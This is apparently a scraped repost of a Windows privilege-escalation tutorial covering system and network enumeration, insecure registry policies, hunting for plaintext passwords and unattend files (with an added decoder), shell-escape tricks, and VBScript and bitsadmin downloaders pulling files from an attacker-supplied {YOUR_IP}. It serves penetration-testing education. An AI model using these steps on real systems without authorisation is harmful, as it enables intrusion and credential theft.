BASIC WINDOWS PRIVILEGE ESCALATION

Source: Internet   Published: java分段函数是   Editor: 程序博客网   Time: 2024/06/05 17:16

https://thel3l.me/blog/winprivesc/index.html



Introduction-

This post is an attempt to get you started off on privilege escalation on Windows. It is by no means a comprehensive guide, but will attempt to cover all the major techniques in order to give you a base upon which you can build.

A list of extremely good resources is available at the bottom of this post.


Operating System-

Let's start the Privilege Escalation process with a Limited user account on the system. At this point, we have very little (or no) information on what the system's functionality is, who uses it and when it is idle, or which hosts it is connected to.


To identify the OS Name and Version:

C:\Users\thel3l> systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.14393 N/A Build 14393

Let's check the architecture of the system:

C:\Users\thel3l> echo %PROCESSOR_ARCHITECTURE% 
AMD64

NOTE: If the system is 32-bit, the above command will return "x86" and for 64-bit systems, it will return "AMD64"


View all environment variables:

C:\Users\thel3l> SET
USERNAME=thel3l
USERPROFILE=C:\Users\thel3l
*snip*

View list of all users on the computer:

C:\Users\thel3l> net user #

User accounts for \\DESKTOP-U0MZPAO
-------------------------------------------------------------------------------
*snip*
The command completed successfully.

Or view more information about a user:

C:\Users\thel3l> net user thel3l #
User name thel3l
*snip*
The command completed successfully.

Networking-

Let's take a look at the networking setup of the system - the interfaces, the routing table, the ARP cache, the firewall and so on.


To view the available networking interfaces:

C:\Users\thel3l> ipconfig /all #

To view the routing table:

C:\Users\thel3l> route print #

To view the ARP cache:

C:\Users\thel3l> arp -A #

To view active connections and listening ports (netstat), and then the firewall configuration:

C:\Users\thel3l> netstat -ano #
C:\Users\thel3l> netsh firewall show config #
C:\Users\thel3l> netsh firewall show state #

Applications and services-

Let's take a look at the running services and applications, their versions and patch levels:

To view the scheduled tasks on a system:

C:\Users\thel3l> schtasks /QUERY /fo LIST /v #

To view the Process IDs of services:

C:\Users\thel3l> tasklist /SVC #

To view a list of installed drivers:

C:\Users\thel3l> DRIVERQUERY #

A lot of valuable information can be obtained from WMIC, the Windows Management Instrumentation Command-line. It is extremely useful and allows you to perform a range of operations - from obtaining data to program uninstallation.


To view a list of installed programs with their versions (outdated versions are where known vulnerabilities live, hint, hint.):

C:\Users\thel3l> wmic product list brief #

Similarly, to view a list of services, processes or startup programs:

C:\Users\thel3l> wmic service list brief # Lists services
C:\Users\thel3l> wmic process list brief # Lists processes
C:\Users\thel3l> wmic startup list brief # Lists startup items

Check if Windows Installer packages (.msi) are configured to run with elevated privileges for unprivileged users (the AlwaysInstallElevated policy; it is only exploitable when the value is set to 1 in both the HKCU and HKLM keys):

C:\Users\thel3l> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
C:\Users\thel3l> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Note: If you get 'The system was unable to find the specified registry key or value', it generally means that this policy was never configured, which is the safe default.


Check whether the NFS server honours setuid or setgid bits:

C:\Users\thel3l> reg query HKLM\SYSTEM\CurrentControlSet\Services\NfsSvr\Parameters /v SafeSetUidGidBits # This will only work on Windows Server with Server for NFS installed. A value of '0' indicates UNIX-like behaviour (setuid/setgid bits are honoured).

Check installed updates and date of installations:

C:\Users\thel3l> wmic qfe get Caption,Description,HotFixID,InstalledOn #

Alternatively, check whether a specific patch (and therefore the fix for a specific vulnerability) is installed:

C:\Users\thel3l> wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KBxxxxxxx" # Replace with a patch version that you are searching for. Eg - KB3189031

If you receive no output from the above command, it means that that particular patch wasn't installed (or was installed by a mechanism that does not register as a hotfix, so confirm with the vendor's guidance before relying on it).

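The same check, done offline on captured output rather than with findstr, as an added example that is not part of the original post: it parses the fixed-width table that wmic qfe prints and reports which of a list of required KBs are missing. The sample output is constructed, and the date format assumes the US locale (M/D/YYYY) that wmic uses by default.

```python
import re

# Constructed sample of `wmic qfe get Caption,Description,HotFixID,InstalledOn`
# output; not captured from a real host, but it mirrors wmic's fixed-width table.
SAMPLE_QFE = """\
Caption                                     Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=3189031  Security Update  KB3189031  9/14/2016
http://support.microsoft.com/?kbid=3176936  Update           KB3176936  9/14/2016
http://support.microsoft.com/?kbid=3199986  Security Update  KB3199986
"""

# HotFixID column ("KB" + digits) optionally followed by the InstalledOn date.
# The Caption column says "kbid=" in lowercase, so a case-sensitive match on
# "KB" picks up only the HotFixID column.
HOTFIX_RE = re.compile(r"\b(KB\d{6,7})\b(?:\s+(\d{1,2}/\d{1,2}/\d{4}))?")


def parse_qfe(output):
    """Map hotfix id -> InstalledOn string (None when wmic left the column blank)."""
    hotfixes = {}
    for line in output.splitlines():
        match = HOTFIX_RE.search(line)
        if match:
            hotfixes[match.group(1)] = match.group(2)
    return hotfixes


def missing_patches(output, required):
    """KB ids from `required` that do not appear in the wmic qfe output."""
    installed = parse_qfe(output)
    return sorted(kb for kb in required if kb not in installed)


if __name__ == "__main__":
    # KB3189031 is the example id used in the post; the other is a placeholder.
    for kb in missing_patches(SAMPLE_QFE, ["KB3189031", "KB0000000"]):
        print("missing:", kb)
```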

Sensitive data and directories-

Check for unencrypted passwords, or juicy files with sensitive info:

C:\Users\thel3l> cd \ # Start the search from the root of the drive.
C:\Users\thel3l> dir /b/s password.txt # Will search for all password.txt files on the filesystem.
C:\Users\thel3l> dir /b/s config.* # Will search for all files starting with 'config' on the filesystem.
C:\Users\thel3l> findstr /si password *.xml *.ini *.txt #
C:\Users\thel3l> findstr /si login *.xml *.ini *.txt #

In addition to this, you can also check for unattended installation answer files. These files often contain local or auto-logon passwords stored in base64 rather than encrypted. You're more likely to find these files in large enterprises, where manual installation of individual systems is impractical. The common locations of these files are:

C:\sysprep.inf
C:\sysprep\sysprep.xml
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml

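An audit helper for those answer files, as an added example that is not part of the original post: it walks an unattend-format XML document, finds password elements, and recovers the value so a leftover file can be flagged and cleaned up. It assumes the documented unattend encoding (base64 of the UTF-16LE password with the element name appended) and uses a constructed sample file.

```python
import base64
import xml.etree.ElementTree as ET

NS = "urn:schemas-microsoft-com:unattend"
PASSWORD_ELEMENTS = ("AdministratorPassword", "Password")


def encode_unattend_password(password, element_name):
    """Unattend 'obfuscation': base64(UTF-16LE(password + element name))."""
    return base64.b64encode((password + element_name).encode("utf-16-le")).decode("ascii")


def decode_unattend_password(value, element_name):
    """Reverse of encode_unattend_password; tolerates a missing suffix."""
    text = base64.b64decode(value).decode("utf-16-le")
    if text.endswith(element_name):
        text = text[: -len(element_name)]
    return text


def find_credentials(xml_text):
    """Return [(element name, plaintext password)] for every password in the file."""
    found = []
    for elem in ET.fromstring(xml_text).iter():
        tag = elem.tag.split("}")[-1]  # strip the namespace prefix
        if tag not in PASSWORD_ELEMENTS:
            continue
        value = elem.find(f"{{{NS}}}Value")
        if value is None or not value.text:
            continue
        plain = elem.find(f"{{{NS}}}PlainText")
        if plain is not None and (plain.text or "").strip().lower() == "true":
            found.append((tag, value.text))
        else:
            found.append((tag, decode_unattend_password(value.text, tag)))
    return found


# Constructed sample answer file (not taken from any real system).
SAMPLE_UNATTEND = f"""<?xml version="1.0"?>
<unattend xmlns="{NS}">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts><AdministratorPassword>
        <Value>{encode_unattend_password("S3cretP@ss", "AdministratorPassword")}</Value>
        <PlainText>false</PlainText>
      </AdministratorPassword></UserAccounts>
      <AutoLogon><Username>svc_deploy</Username>
        <Password><Value>L3ftover!</Value><PlainText>true</PlainText></Password>
      </AutoLogon>
    </component>
  </settings>
</unattend>"""
```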
File systems-

Let's take a look at what kind of access we have, which directories are accessible, and what permissions are set on files.

Pre-installed scripting languages can be used to break out of restrictive shells:

import os; os.system("cmd /c {command here}")  # Python

Or maybe launch an FTP session, and execute commands from within it?

C:\Users\thel3l> copy con ftp.bat # Will allow you to edit a file called ftp.bat
ftp # Enter the name of the program (ftp here), press CTRL+Z to finish editing, and hit return.
C:\Users\thel3l> ftp.bat # Executing the file.
ftp> # We are thrown into the ftp application. Now we can attempt to execute commands -
ftp> !{command} # e.g. - !dir or !ipconfig

Or just make a VBS script:

C:\Users\thel3l> copy con commandExec.vbs # Will allow you to edit a file called commandExec.vbs
Call WScript.CreateObject("Wscript.Shell").Run("cmd /K {command}", 8, True) # Use your own command, press CTRL+Z to finish editing, and hit return.
C:\Users\thel3l> commandExec.vbs # Launch the script.

To get a first look at which folders may be writable (this lists directories without the read-only attribute, which is not the same as an ACL check; confirm with icacls before relying on it):

C:\Users\thel3l> dir /a-r-d /s /b

Exploiting the system, useful scripts-

Armed with all this information, we can now begin the process of actually elevating our privileges:

A neat VBScript to download files onto the host, courtesy of Igor:

' downloadfile.vbs
' Set your settings
strFileURL = "http://{YOUR_IP}/{FILE_NAME.EXT}"
strHDLocation = "c:\{FILE_NAME.EXT}"

' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, False
objXMLHTTP.send

If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    objADOStream.Type = 1 'adTypeBinary

    objADOStream.Write objXMLHTTP.ResponseBody
    objADOStream.Position = 0 'Set the stream position to the start

    ' Remove any existing copy before saving
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    If objFSO.FileExists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    Set objFSO = Nothing

    objADOStream.SaveToFile strHDLocation
    objADOStream.Close
    Set objADOStream = Nothing
End If

Set objXMLHTTP = Nothing

This script is highly useful, and will run on any version of Windows. To execute it, simply do:

C:\Users\thel3l> cscript.exe downloadfile.vbs # Replace the file name with whatever you've saved the script as.

If you know that the OS on the host's system is Windows 7 and above, simply use the bitsadmin utility:

C:\Users\thel3l> bitsadmin /transfer job_name /download /priority priority URL local\path\file # Syntax
C:\Users\thel3l> bitsadmin /transfer mydownloadjob /download /priority normal http://{YOUR_IP}/{FILE_NAME.EXT} C:\Users\username\Downloads\{FILE_NAME.EXT}

Searching for exploits and shellcode-

http://www.exploit-db.com
http://1337day.com
http://0day.today
http://www.securityfocus.com
http://seclists.org/fulldisclosure/
http://www.exploitsearch.net
http://www.securiteam.com
http://metasploit.com/modules/
http://securityreason.com
https://cxsecurity.com/exploit/
http://securitytracker.com/


Other excellent resources, scripts, toolkits and guides-

rmusser01's GitHub document to Post Exploitation on Windows
Tim Arneaud on Windows Privilege Escalation
An article on WMIC
Luke Jennings on Group Policy Hijacking Attacks
Toying with the Windows API
enaqx - Excellent curated collection of content

PowerShellMafia's PowerSploit
The SysInternals suite
Windows Credential Editor
Mimikatz - Credential Extraction
GDSSecurity's Windows Exploit Suggester
SpiderLab's Responder - A LLMNR, NBT-NS and MDNS poisoner
PowerShellEmpire's Empire - Pure PowerShell post-exploitation agent
rabbitstack's fibratus - A tool for exploration and tracing of the Windows kernel

